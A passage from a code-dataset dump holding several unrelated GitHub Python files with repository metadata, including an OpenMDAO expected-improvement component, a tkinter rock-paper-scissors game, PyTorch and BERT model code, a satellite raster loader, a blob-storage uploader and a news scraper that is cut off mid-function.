openmdao.main.api import Component\nfrom openmdao.util.decorators import stub_if_missing_deps\n\nfrom openmdao.main.uncertain_distributions import NormalDistribution\n\n@stub_if_missing_deps(*_check)\nclass ExpectedImprovement(Component):\n best_case = Slot(CaseSet, iotype=\"in\",\n desc=\"CaseSet which contains a single case \"\n \"representing the criteria value.\", required=True)\n \n criteria = Str(iotype=\"in\",\n desc=\"Name of the variable to maximize the expected \"\n \"improvement around. 
Must be a NormalDistribution type.\")\n \n predicted_value = Slot(NormalDistribution,iotype=\"in\",\n desc=\"The Normal Distribution of the predicted value \"\n \"for some function at some point where you wish to\"\n \" calculate the EI.\")\n \n EI = Float(0.0, iotype=\"out\", \n desc=\"The expected improvement of the predicted_value.\")\n \n PI = Float(0.0, iotype=\"out\", \n desc=\"The probability of improvement of the predicted_value.\")\n \n def execute(self): \n \"\"\" Calculates the expected improvement of the model at a given point.\n \"\"\"\n \n mu = self.predicted_value.mu\n sigma = self.predicted_value.sigma\n best_case = self.best_case[0]\n try: \n target = best_case[self.criteria]\n except KeyError: \n self.raise_exception(\"best_case did not have an output which \"\n \"matched the criteria, '%s'\"%self.criteria,\n ValueError) \n try:\n \n self.PI = 0.5+0.5*erf((1/2**.5)*((target-mu)/sigma))\n \n T1 = (target-mu)*.5*(1.+erf((target-mu)/(sigma*2.**.5)))\n T2 = sigma*((1./((2.*pi)**.5))*exp(-0.5*((target-mu)/sigma)**2.))\n self.EI = abs(T1+T2)\n\n except (ValueError,ZeroDivisionError): \n self.EI = 0\n self.PI = 0 \n \n \n \n","repo_name":"RubenvdBerg/SatToolAG","sub_path":"OldOpenMDAO/OpenMDAO-Framework-0.2.7/openmdao.lib/src/openmdao/lib/components/expected_improvement.py","file_name":"expected_improvement.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"12249605213","text":"from tkinter import *\nfrom PIL import Image, ImageTk\nimport random\n\nroot = Tk()\n\nroot.iconbitmap(r'C:\\Users\\Hakan\\Desktop\\Hakan\\image\\icon.ico')\nroot.title('ROCK SCISSORS PAPER')\n\nroot.resizable(width = False, height = False)\n\nRockPhoto = ImageTk.PhotoImage(Image.open(\"ROCK.png\"))\nPaperPhoto = ImageTk.PhotoImage(Image.open(\"PAPER.png\"))\nScissorsPhoto = ImageTk.PhotoImage(Image.open(\"SCISSORS.png\"))\n\nimage_list = [RockPhoto, PaperPhoto, ScissorsPhoto]\n\nuser = \"\"\ncomputer = \"\"\nuser_score = 0\ncomputer_score = 0\n\nmylabel = Label(root, text = \"\")\ncomputer_label = Label(root, text = \"\")\nlabel = Label(root, text = \"\")\nuser_score_label = Label(root, text = \"\")\ncomputer_score_label = Label(root, text = \"\")\n\ndef select_rock():\n global mylabel\n global user\n\n mylabel.grid_forget()\n mylabel.destroy()\n\n mylabel = Label(root, image = image_list[0])\n mylabel.grid(row = 2, column = 0)\n\n user = image_list[0]\n\n Computer_pick()\n\n if_else(user, computer)\n\n mylabel2 = Label(root, text = \"PLAYER\", fg = \"White\", bg = \"Blue\") \n mylabel2.grid(row = 7, column = 0)\n\ndef select_paper():\n global mylabel\n global user\n \n mylabel.grid_forget()\n\n mylabel = Label(root, image = image_list[1])\n mylabel.grid(row = 2, column = 0)\n\n user = image_list[1]\n\n Computer_pick()\n\n if_else(user, computer)\n\n mylabel2 = Label(root, text = \"PLAYER\", fg = \"White\", bg = \"Blue\")\n mylabel2.grid(row = 7, column = 0) \n\ndef select_scissors():\n global mylabel\n global user\n\n mylabel.grid_forget()\n \n mylabel = Label(root, image = image_list[2])\n mylabel.grid(row = 2, column = 0)\n\n user = image_list[2]\n\n Computer_pick()\n\n if_else(user, computer)\n\n mylabel2 = Label(root, text = \"PLAYER\", fg = \"White\", bg = \"Blue\")\n mylabel2.grid(row = 7, column = 0)\n\ndef Computer_pick():\n global computer_label\n global computer\n\n computer_label.grid_forget()\n \n computer = random.choice(image_list)\n\n computer_label = Label(root, image = computer)\n
computer_label.grid(row = 2, column = 2) \n\n mylabel3 = Label(root, text = \"COMPUTER\", fg = \"White\", bg = \"Blue\")\n mylabel3.grid(row = 7, column = 2)\n \n\ndef if_else(user, computer):\n global label\n global user_score_label\n global user_score\n global computer_score_label\n global computer_score\n\n if user == image_list[0] and computer == image_list[1]:\n label.grid_forget()\n label = Label(root, text = \"Computer Won\")\n label.grid(row = 8, column = 2)\n computer_score += 1\n elif user == image_list[0] and computer == image_list[2]:\n label.grid_forget()\n label = Label(root, text = \"User Won\")\n label.grid(row = 8, column = 0)\n user_score += 1\n elif user == image_list[1] and computer == image_list[2]:\n label.grid_forget()\n label = Label(root, text = \"Computer Won\")\n label.grid(row = 8, column = 2)\n computer_score += 1\n elif user == image_list[1] and computer == image_list[0]:\n label.grid_forget()\n label = Label(root, text = \"User Won\")\n label.grid(row = 8, column = 0)\n user_score += 1\n elif user == image_list[2] and computer == image_list[0]:\n label.grid_forget()\n label = Label(root, text = \"Computer Won\")\n label.grid(row = 8, column = 2)\n computer_score += 1\n elif user == image_list[2] and computer == image_list[1]:\n label.grid_forget()\n label = Label(root, text = \"User Won\")\n label.grid(row = 8, column = 0)\n user_score += 1\n elif user == image_list[0] and computer == image_list[0]:\n label.grid_forget()\n label = Label(root, text = \"Draw\")\n label.grid(row = 8, column = 1)\n elif user == image_list[1] and computer == image_list[1]:\n label.grid_forget()\n label = Label(root, text = \"Draw\")\n label.grid(row = 8, column = 1)\n elif user == image_list[2] and computer == image_list[2]:\n label.grid_forget()\n label = Label(root, text = \"Draw\")\n label.grid(row = 8, column = 1)\n\n clear_button = Button(root, text = \"Clear score\", command = clear)\n clear_button.grid(row = 10, column = 1)\n\n exit_button = Button(root, text = \"Exit!\", command = root.quit, bg = \"Black\", fg = \"White\")\n exit_button.grid(row = 13, column = 1)\n exit_button.place(x = 250, y = 600)\n\n user_score_label = Label(root, text = user_score)\n user_score_label.grid(row = 9, column = 0)\n computer_score_label = Label(root, text = computer_score)\n computer_score_label.grid(row = 9, column = 2)\n\ndef clear():\n global user_score\n global computer_score\n\n user_score = 0\n computer_score = 0\n\n label.grid_forget()\n\n user_score_label = Label(root, text = user_score)\n user_score_label.grid(row = 9, column = 0)\n computer_score_label = Label(root, text = computer_score)\n computer_score_label.grid(row = 9, column = 2)\n\ndef play():\n root.geometry(\"600x700\")\n\n play_button.destroy()\n\n my_label = Label(root, text = \"Select\", bg = \"Green\", fg = \"White\")\n my_label.grid(row = 0, column = 4)\n\n Rock_Button = Button(root, text = \"Rock\", command = select_rock)\n Rock_Button.grid(row = 0, column = 0)\n\n Paper_Button = Button(root, text = \"Paper\", command = select_paper)\n Paper_Button.grid(row = 0, column = 1)\n\n Scissors_Button = Button(root, text = \"Scissors\", command = select_scissors)\n Scissors_Button.grid(row = 0, column = 2)\n\nroot.geometry(\"30x30\")\nplay_button = Button(root, text = \"Play\", command = play)\nplay_button.grid(row = 0, column = 0, padx = 100)\nplay_button.place(x = 40, y = 
0)\n\n\n\nroot.mainloop()","repo_name":"MesutHakanTaskiner/Rock-Scissors-Paper","sub_path":"Game.py","file_name":"Game.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"37931731999","text":"'''\n A simple autoencoder model that repeats previous works\n'''\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nfrom torch.autograd import Variable\nfrom src.models.common_blocks import ConvBlock, ConvTransposeBlock\nactivations = {\n 'relu': F.relu,\n 'sigmoid': F.sigmoid,\n 'softmax': F.softmax\n}\n\n\nclass EncoderBlock(nn.Sequential):\n \n def __init__(self, in_channels, features_num, expand_rate, kernel_sizes=[5,2,5,2,5], \n strides = [1,2,1,2,1], paddings = [2,0,2,0,2], bias = True):\n super(EncoderBlock, self).__init__()\n for i in range(len(kernel_sizes)):\n alias = \"_\".join([\"Conv2d\", str(kernel_sizes[i]), str(features_num)])\n self.add_module(alias, ConvBlock(in_channels, features_num, kernel_sizes[i], strides[i], \n paddings[i], bias))\n in_channels = features_num\n if strides[i] == 1:\n features_num *= expand_rate \n\n \nclass MyAutoencoderTied(nn.Module):\n def __init__(self, in_channels=1, start_features_num=16, expand_rate=2, kernel_sizes=[5,2,5,2,5], \n strides = [1,2,1,2,1], paddings = [2,0,2,0,2], bias = False, final_activation='relu'):\n super(MyAutoencoderTied, self).__init__()\n self.final_activation = final_activation\n self.encoder = EncoderBlock(in_channels, start_features_num, expand_rate, kernel_sizes, strides,\n paddings, bias)\n \n max_features = start_features_num * expand_rate*len([stride for stride in strides if stride!=1])\n \n \n def forward(self, x):\n\n x = self.encoder(x)\n for i in range(len(self.encoder)-1,-1,-1):\n conv_layer = self.encoder[i].conv\n x = F.conv_transpose2d(input=x, weight=conv_layer.weight, padding=conv_layer.padding, stride=conv_layer.stride,bias=conv_layer.bias)\n if i==0 and self.final_activation=='linear':\n continue\n else:\n x = activations['relu'](x)\n return x\n\n\ndef myAutoencoderTied(in_channels, out_channels, final_activation):\n return MyAutoencoderTied(in_channels, 16, 2, kernel_sizes=[5,2,5,2,5], \n strides = [1,2,1,2,1], paddings = [2,0,2,0,2], final_activation=final_activation)\n","repo_name":"kubrak94/training_pipeline","sub_path":"src/models/autoencoder_tied.py","file_name":"autoencoder_tied.py","file_ext":"py","file_size_in_byte":2355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"16092676399","text":"# External Imports\nimport logging\nimport re\n\nimport numpy as np\nimport rasterio as rio\nfrom typing import Optional, List\nfrom copy import deepcopy\nfrom datetime import datetime\n\n# Internal Imports\nfrom raster_pack.exceptions import GeospatialDataException\nfrom raster_pack.dataset.dataset import Dataset\n\n# Setup Logger\nlogger = logging.getLogger(\"raster_pack.io.safe\")\n\n\ndef get_datasets(path: str, flat: Optional[bool] = False) -> List[Dataset]:\n \"\"\"Create a list of datasets from a given SAFE file\n\n :param path: The path the SAFE file is located at\n :param flat: Whether or not the output list should be flat or nested\n :return: A list of Dataset objects containing the data from the SAFE file\n \"\"\"\n\n # Get Subdatasets as properly formatted path strings\n subdataset_paths = []\n parent_dataset_path = None\n with rio.open(path) as dataset:\n # Get the path for the parent dataset\n parent_dataset_path = 
dataset.name\n\n # Get the GDAL-formatted paths for all the subdatasets\n if dataset.subdatasets is not None and len(dataset.subdatasets) > 0:\n subdataset_paths = dataset.subdatasets\n else:\n raise RuntimeError(\"No subdatasets found in the given SAFE file!\")\n\n # Create Dataset object of the parent dataset\n # Note: We ignore missing CRS, etc. data for parent datasets. This is common with SAFE files\n parent_dataset = create_dataset(path=parent_dataset_path)\n\n # Create Dataset objects from subdatasets\n datasets = []\n for subdataset_path in subdataset_paths:\n new_dataset = create_dataset(subdataset_path)\n datasets.append(new_dataset)\n\n if flat:\n # Note: Not a good idea to include the \"empty\" parent dataset\n # datasets.append(parent_dataset)\n\n # Return loaded datasets\n return datasets\n else:\n # Return parent dataset with nested subdatasets\n assert parent_dataset is not None\n parent_dataset.subdatasets = datasets\n return [parent_dataset]\n\n\ndef create_dataset(path: str, datatype: Optional[object] = None) -> Dataset:\n \"\"\"Create a dataset from a given GDAL-formatted SAFE subdataset path string\n\n :param path: GDAL-formatted subdataset path\n :param datatype: Rasterio datatype to use\n :return: Dataset created from the GDAL-compatible dataset at the specified path\n \"\"\"\n\n # --[ Open Raster for Processing, Get Important Values ]--\n with rio.open(path) as dataset:\n\n # Display warning for user if a CRS is not detected in the source raster\n if dataset.crs is None:\n logger.warning(\"No CRS detected for input raster file! This may be an issue with the file or GDAL!\")\n # raise GeospatialDataException(\"[ERROR] No CRS found! This may be due to an issue with GDAL!\")\n\n # Create Dictionary to Store Data\n output_dict = {}\n\n # Get data using Rasterio\n for i, band_index in enumerate(dataset.indexes):\n\n # If there is no user-defined datatype, use the original dataset datatype\n if datatype is None:\n datatype = dataset.dtypes[i]\n\n # Read from the dataset into the output dictionary\n output_dict[\"{}\".format(dataset.descriptions[i])] = dataset.read(band_index).astype(datatype)\n\n # Gather data from product name code\n # [FIXME] THE DATA GATHERING REGEX _IS NOT CORRECT_ FOR DATASETS FROM BEFORE 2016-12-06!!!\n name_butchered = re.search(\n pattern=r'S(?P[A-Z,0-9]{2})_MSI(?P[A-Z,0-9]{3})_(?P[0-9]{8}T[0-9]{6})_N(?P[0-9]{4})_R(?P[0-9]{3})_T(?P[A-Z,0-9]{5})_(?P[0-9]{8}T[0-9]{6}).SAFE',\n string=str(dataset.name)\n )\n\n # Get all relevant \"tags\" (metadata from the original file)\n dataset_tags = dataset.tags()\n\n # Vitally important items\n # [TODO] Fix assumption that all SAFE datasets use 16-bit unsigned ints\n # WARNING: Rasterio doesn't seem to recognize nodata for SAFE files!\n nodata_value = np.uint16(dataset_tags['SPECIAL_VALUE_NODATA'])\n saturation_value = np.uint16(dataset_tags['SPECIAL_VALUE_SATURATED'])\n\n # Assemble metadata list\n meta = {\n \"date\": datetime.strptime(name_butchered.group('sensor_start_datetime'), '%Y%m%dT%H%M%S'), # Get only the date using a regex\n \"resolution\": deepcopy(dataset.res),\n \"mission_id\": str(name_butchered.group('mission_id')),\n \"product_level\": str(name_butchered.group('product_level')),\n \"tile_id\": str(name_butchered.group('tile_id')),\n \"processing_baseline_number\": str(name_butchered.group('processing_baseline_number')),\n \"relative_orbit_number\": str(name_butchered.group('relative_orbit_number')),\n \"product_discriminator\": str(name_butchered.group('product_discriminator')),\n 
\"saturated_value\": saturation_value\n }\n profile = deepcopy(dataset.profile)\n\n # Copy other relevant information to the profile\n profile.data[\"pixel_dimensions\"] = dataset.res\n\n # Create and return new dataset\n return Dataset(profile=profile, bands=output_dict, meta=meta, nodata=nodata_value)\n","repo_name":"adamweingram/RasterPack","sub_path":"raster_pack/io/safe.py","file_name":"safe.py","file_ext":"py","file_size_in_byte":5329,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"6475859223","text":"# Пользователь вводит три стороны треугольника,\n# необходимо по формуле Герона рассчитать его площадь и вывести на экран.\n\nside_a = int(input('Введите 1 сторону треугольника: '))\nside_b = int(input('Введите 2 сторону треугольника: '))\nside_c = int(input('Введите 3 сторону треугольника: '))\n\nd = (side_a + side_b + side_c) / 2.0\nsquare = (d * (d - side_a) * (d - side_b) * (d - side_c)) ** 0.5\n\nprint('Площадь треуголника по формуле Герона: ', square)","repo_name":"python-VS/Courses","sub_path":"homework/first_tasks_may/first_task_3.py","file_name":"first_task_3.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22168896820","text":"\"\"\"\nThis module contains the `BlobStorage` class.\n\"\"\"\nimport logging\n\nfrom .exceptions import (BlobStorageMissingCredentialsError,\n BlobStorageUnrecognizedProviderError, )\nfrom .providers import PROVIDERS\nfrom .providers.backblaze import Backblaze\nfrom .providers.exceptions import (ProviderAuthorizationError,\n ProviderFileUploadError)\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass BlobStorage:\n \"\"\"\n Asynchronous object storage interface for common operations, e.g.\n uploading a file to a bucket.\n\n Providers currently supported:\n\n Backblaze.\n \"\"\"\n PROVIDER_ADAPTER = {\n 'backblaze': {\n 'adapter': Backblaze,\n 'required': ('account_id', 'app_key'),\n }\n }\n\n def __init__(self, provider, **kwargs):\n r\"\"\"\n Set the object storage provider.\n\n :param str provider: Name of the object storage provider. 
Must be one\n of `'backblaze'`.\n :param \\**kwargs: Credentials for the object storage provider, see\n below.\n\n : Keyword arguments:\n * *account_id* (``str``) --\n Account id (Backblaze).\n * *app_key* (``str``) --\n Application key (Backblaze).\n \"\"\"\n LOGGER.debug('Creating instance of `BlobStorage` class')\n if provider not in PROVIDERS:\n raise BlobStorageUnrecognizedProviderError\n if not all(r in kwargs\n for r in self.PROVIDER_ADAPTER[provider]['required']):\n raise BlobStorageMissingCredentialsError\n self.provider = self.PROVIDER_ADAPTER[provider]['adapter'](**kwargs)\n\n async def upload_file(self, bucket_id, file_to_upload):\n \"\"\"\n **async** Upload a single file to the object storage provider.\n\n :param str bucket_id: Object storage provider bucket to upload files\n to.\n :param dict file_to_upload: Local file to upload,\n `{'path': str, 'content_type': str}`.\n :raise ProviderAuthorizationError: If authorization to the object\n storage provider is unsuccessful.\n :raise ProviderFileUploadError: If uploading of the file to the object\n storage provider bucket is unsuccessful.\n :return: Response from object storage provider.\n :rtype: ``dict``\n \"\"\"\n upload_file_meta = (file_to_upload['path'],\n type(self.provider).__name__, bucket_id)\n LOGGER.info('Uploading file \"%s\" to %s bucket %s' % upload_file_meta)\n LOGGER.debug('Authenticating')\n auth_response = await self.provider.authorize()\n if not auth_response:\n raise ProviderAuthorizationError\n LOGGER.debug('Authentication successful')\n LOGGER.debug('Uploading')\n upload_file_response = await self.provider.upload_file(\n bucket_id, file_to_upload['path'], file_to_upload['content_type'])\n if not upload_file_response:\n raise ProviderFileUploadError\n LOGGER.info('Successfully uploaded file \"%s\" to %s bucket %s'\n % upload_file_meta)\n LOGGER.debug(upload_file_response)\n return upload_file_response\n","repo_name":"grking8/aiostorage","sub_path":"aiostorage/blob_storage.py","file_name":"blob_storage.py","file_ext":"py","file_size_in_byte":3243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"35403317529","text":"import numpy as np\nfrom sklearn.base import BaseEstimator, ClassifierMixin, clone\nfrom sklearn.utils.validation import check_X_y, check_array, check_is_fitted\n\nclass SurvivalStacking(BaseEstimator, ClassifierMixin):\n \"\"\"Stacking-based survival analysis classifier.\n\n Parameters:\n base_models : list, optional\n List of base classification models for stacking. Default is None.\n meta_model : object, optional\n Meta-classification model for stacking. Default is None.\n\n Attributes:\n base_models : list\n List of base classification models.\n meta_model : object\n Meta-classification model.\n meta_model_ : object\n Fitted meta-classification model.\n\n \"\"\"\n\n def __init__(self, base_models=None, meta_model=None):\n self.base_models = base_models\n self.meta_model = meta_model\n\n def fit(self, X, y, base_models=None):\n \"\"\"Fit the survival stacking model.\n\n Parameters:\n X : array-like, shape (n_samples, n_features)\n Input features for training.\n y : array-like, shape (n_samples,)\n Binary outcome indicating whether an event occurred or not.\n base_models : list, optional\n List of base classification models for stacking. 
Default is None.\n\n        Returns:\n        self : object\n\n        \"\"\"\n        # Validate input arrays X and y\n        X, y = check_X_y(X, y)\n\n        if base_models is not None:\n            self.base_models = base_models\n\n        # Fit the base models\n        for model in self.base_models:\n            model.fit(X, y)\n\n        # Fit the meta model using base models' predictions\n        meta_features = self._get_base_model_predictions(X)\n\n        # Initialize the meta model\n        self.meta_model_ = clone(self.meta_model)\n\n        # Fit the meta model using base models' predictions\n        self.meta_model_.fit(meta_features, y)\n\n        return self\n\n    def predict(self, X):\n        \"\"\"Predict using the survival stacking model.\n\n        Parameters:\n        X : array-like, shape (n_samples, n_features)\n            Input features for prediction.\n\n        Returns:\n        predictions : array-like, shape (n_samples,)\n            Predicted binary outcomes.\n\n        Raises:\n        NotFittedError : If the model has not been fitted yet.\n\n        \"\"\"\n        # Check if the model has been fitted\n        check_is_fitted(self, 'meta_model_')\n\n        # Validate input array X\n        X = check_array(X)\n\n        # Get base models' predictions and make ensemble predictions\n        meta_features = self._get_base_model_predictions(X)\n        predictions = self.meta_model_.predict(meta_features)\n\n        return predictions\n\n    def set_meta_model(self, meta_model):\n        \"\"\"Set the meta-classification model.\n\n        Parameters:\n        meta_model : object\n            Meta-classification model for stacking.\n\n        \"\"\"\n        self.meta_model = meta_model\n\n    def set_base_models(self, base_models):\n        \"\"\"Set the base classification models.\n\n        Parameters:\n        base_models : list\n            List of base classification models for stacking.\n\n        \"\"\"\n        self.base_models = base_models\n\n    def _get_base_model_predictions(self, X):\n        \"\"\"Get predictions from base models.\n\n        Parameters:\n        X : array-like, shape (n_samples, n_features)\n            Input features for prediction.\n\n        Returns:\n        meta_features : array-like, shape (n_samples, n_base_models)\n            Predicted probabilities from base models.\n\n        \"\"\"\n        # Get predictions from base models\n        meta_features = []\n        for model in self.base_models:\n            predictions = model.predict_proba(X)[:, 1]\n            meta_features.append(predictions)\n\n        return np.column_stack(meta_features)\n","repo_name":"AlrxKali/BLK_API","sub_path":"stacking_survival_analysis/src/stacking.py","file_name":"stacking.py","file_ext":"py","file_size_in_byte":3926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"71652581961","text":"\"\"\"\n    4) Display the third parties contained in the data.py file\n    that have no email or no cellPhone.\n\"\"\"\nfrom data import get_thirds\n\nthirds = get_thirds()\n\nfor third in thirds:\n    if not third['email'] or not third['cellPhone']:\n        print(third)","repo_name":"jcav67/test-python","sub_path":"test-python/test_4.py","file_name":"test_4.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"29198359163","text":"from transformers import ElectraTokenizer\nfrom .model import ElectraForMultiLabelClassification\nfrom pprint import pprint\nimport torch\nimport numpy as np\nimport pickle\n\nfrom .filepath import TOKENIZER_PATH\n\ndef load_model():\n    with open(TOKENIZER_PATH, \"rb\") as f:\n        tokenizer = pickle.load(f)\n        f.close()\n    model = ElectraForMultiLabelClassification.from_pretrained(\"monologg/koelectra-base-v3-goemotions\")\n    return tokenizer, model\n\ndef predict(text, tokenizer, model):\n    inputs = tokenizer(text,return_tensors=\"pt\")\n    
outputs = model(**inputs)\n    scores = 1 / (1 + torch.exp(-outputs[0]))\n    threshold = 0\n    result = []\n    for item in scores:\n        labels = []\n        scores = []\n        for idx, s in enumerate(item):\n            if s > threshold:\n                labels.append(model.config.id2label[idx])\n                scores.append(s.item())\n        result.append({\"labels\": labels, \"scores\": scores})\n\n    return result","repo_name":"boostcampaitech5/level3_recsys_productserving-recsys-12","sub_path":"fastapi/goemotions/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":959,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"11451928830","text":"# Write a program that merges several dictionaries into one\ndef dict_add(a, b, c):\n    new_dict = {**a, **b, **c}\n    return print(new_dict)\ndef dict_add_2(a, b, c,):\n    new_dict = {}\n    for el in (a, b, c):\n        new_dict.update(el)\n    return print(new_dict)\n\n\nif __name__ == '__main__':\n    dict_add_2({1: 3, 2: 43}, {44: 22, 'a': 122}, {'qq': 55, 2222: 'wewew'})","repo_name":"Maks7117/Python","sub_path":"python/Task4_dict.py","file_name":"Task4_dict.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"5291441546","text":"import os\nimport random\nimport logging\n\nimport torch\nimport numpy as np\n\nfrom transformers import BertConfig\nfrom transformers import BertTokenizer\n\nfrom model import JointBERT, P_Tuning_V2, Prompt\n\nMODEL_CLASSES = {\n    'bert_en': (BertConfig, JointBERT, BertTokenizer),\n    'bert_ch': (BertConfig, JointBERT, BertTokenizer),\n    'p_tuning_v2_en': (BertConfig, P_Tuning_V2, BertTokenizer),\n    'p_tuning_v2_ch': (BertConfig, P_Tuning_V2, BertTokenizer),\n}\n\n\nMODEL_PATH_MAP = {\n    'bert_en': 'bert-base-uncased',\n    'bert_ch': 'bert-base-chinese',\n    'p_tuning_v2_en': 'bert-base-uncased',\n    'p_tuning_v2_ch': 'bert-base-chinese',\n}\n\n\ndef get_intent_labels(args):\n    return [label.strip() for label in open(os.path.join(args.data_dir, args.task, args.intent_label_file), 'r', encoding='utf-8')]\n\n\ndef load_tokenizer(args):\n    VOCAB= os.path.join(args.model_name_or_path,MODEL_PATH_MAP[args.model_type] + '-vocab.txt')\n    return MODEL_CLASSES[args.model_type][2].from_pretrained(VOCAB)\n\n\ndef init_logger():\n    logging.basicConfig(format='%(asctime)s - %(levelname)s - %(name)s - %(message)s',\n                        datefmt='%m/%d/%Y %H:%M:%S',\n                        level=logging.INFO)\n\n\ndef set_seed(args):\n    random.seed(args.seed)\n    np.random.seed(args.seed)\n    torch.manual_seed(args.seed)\n    if not args.no_cuda and torch.cuda.is_available():\n        torch.cuda.manual_seed_all(args.seed)\n\n\ndef compute_metrics(intent_preds, intent_labels,):\n    assert len(intent_preds) == len(intent_labels)\n    results = {}\n    intent_result = get_intent_acc(intent_preds, intent_labels)\n    #slot_result = get_slot_metrics(slot_preds, slot_labels)\n    semantic_result = get_sentence_frame_acc(intent_preds, intent_labels)\n\n    results.update(intent_result)\n    #results.update(slot_result)\n    results.update(semantic_result)\n\n    return results\n\ndef get_intent_acc(preds, labels):\n    acc = (preds == labels).mean()\n    return {\n        \"intent_acc\": acc\n    }\n\n\ndef read_prediction_text(args):\n    return [text.strip() for text in open(os.path.join(args.pred_dir, args.pred_input_file), 'r', encoding='utf-8')]\n\n\ndef get_sentence_frame_acc(intent_preds, intent_labels):\n    \"\"\"For the cases that intent and all the slots are correct (in one sentence)\"\"\"\n    # Get the intent comparison result\n    intent_result = (intent_preds == 
intent_labels)\n    #semantic_acc = np.multiply(intent_result, slot_result).mean()\n    semantic_acc = intent_result.mean()\n    return {\n        \"semantic_frame_acc\": semantic_acc\n    }\n","repo_name":"965694547/Intend-Dection","sub_path":"Intend Detection Program/P-Tuning-V2/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"63"} +{"seq_id":"27395104139","text":"import numpy as np\n\ndef plot_posterior(P,case):\n    from IPython.core.pylabtools import figsize\n    from matplotlib import pyplot as plt\n    figsize(11, 9)\n    colours = [\"#348ABD\", \"#A60628\"]\t\n\n    # For the already prepared, I'm using Binomial's conj. prior.\n    k=0\n    for pp in P:\n        sx = plt.subplot(len(P) / 2, 2, k + 1)\n        plt.bar([0, .3], [P[k],1.-P[k]], alpha=0.70, width=0.25,\n                color=[colours[1],colours[0]], label= str(k+1)+ \" trials\",\n                lw=\"3\", edgecolor=[colours[1],colours[0]])\n\n        sx.set_ylim([0.,1.])\n        \n        if k in [len(P) - 2, len(P) - 1]: \n            plt.xticks([0.005, .3], [\"Cancer\", \"No Cancer\"]) \n        else:\n            plt.xticks([0.005, .3], [\" \", \" \"]) \n        \n        #plt.title(\"Posterior probability of Cancer\")\n        plt.ylabel(\"Probability\")\n        plt.legend()\n\n        #plt.autoscale(tight=True)\n        k+=1\n\n    txt = 'Patient has cancer'\n    if case==False:\n        txt = 'Patient has no cancer'\n    \n    plt.suptitle(\"Bayesian updating of posterior probabilities for the case: \" + txt,\n                 y=1.02,\n                 fontsize=14)\n\n    plt.tight_layout()\n    plt.show()\n\n\ndef generate_patient_data(probs,cancer=True,ndata=10):\n    data=np.zeros(ndata)\n    if (cancer==True):\n        for i in range(ndata):\n            data[i]=np.random.choice([1, 0], p=[1-probs['P(Neg|Cancer)'], probs['P(Neg|Cancer)']])\n    else:\n        for i in range(ndata):\n            data[i]=np.random.choice([1, 0], p=[probs['P(Pos|No Cancer)'], 1.-probs['P(Pos|No Cancer)']])\n    \n    return data\n\ndef get_posterior(probs,data):\n    \n    Ntot=len(data)\n    Npos=np.cumsum(data)\n    Nneg=1+np.arange(Ntot)-Npos\n    \n    P_prior = probs['P(Cancer)']\n    P_likelihood = probs['P(Neg|Cancer)']**Nneg*(1.-probs['P(Neg|Cancer)'])**Npos\n    P_a = probs['P(Cancer)']*probs['P(Neg|Cancer)']**Nneg*(1.-probs['P(Neg|Cancer)'])**Npos  \n    P_b = (1.-probs['P(Cancer)'])*(1.-probs['P(Pos|No Cancer)'])**Nneg*probs['P(Pos|No Cancer)']**Npos  \n    P_norm = P_a+P_b  \n    P = P_prior * P_likelihood/(P_norm)\n    \n    return P\n\n\n","repo_name":"jjasche/lecture_Bayesian_info_theory","sub_path":"lecture1/src/cancer_example.py","file_name":"cancer_example.py","file_ext":"py","file_size_in_byte":2183,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22309734538","text":"# This script scrapes the title, time, body text and author of news articles from the given Tencent News pages\r\nfrom requests import *\r\nimport requests\r\nimport GoogleTransla\r\nimport json\r\nfrom lxml import etree\r\nimport datetime\r\nimport SendEmail\r\nimport mainApp\r\nimport tkinter\r\nimport pypandoc\r\nimport lxml.etree\r\nfrom lxml.etree import *\r\nimport queue\r\n\r\n\r\ndef getHTMLText(url):\r\n    try:\r\n        r = requests.get(url,verify='cacert.pem',timeout = 10)\r\n        return r.text\r\n    except requests.exceptions.ConnectTimeout:\r\n        return \"\"\r\n\r\n\r\ndef getLinkList(dic):\r\n    url = dic['starturl']\r\n    html = getHTMLText(url)\r\n    selector = etree.HTML(html)\r\n    links = selector.xpath(dic['listXpath'])\r\n    return links\r\n\r\ndef getContent(dic,articles,w,isSeen=False):  # default assumed so main() can call without the flag and run without an existing seen.json\r\n    links = getLinkList(dic)\r\n    if isSeen:\r\n        with open(\"seen.json\") as seen:\r\n            seenLink = json.load(seen)\r\n    else:\r\n        seenLink = []\r\n    for link in links:\r\n        link = 
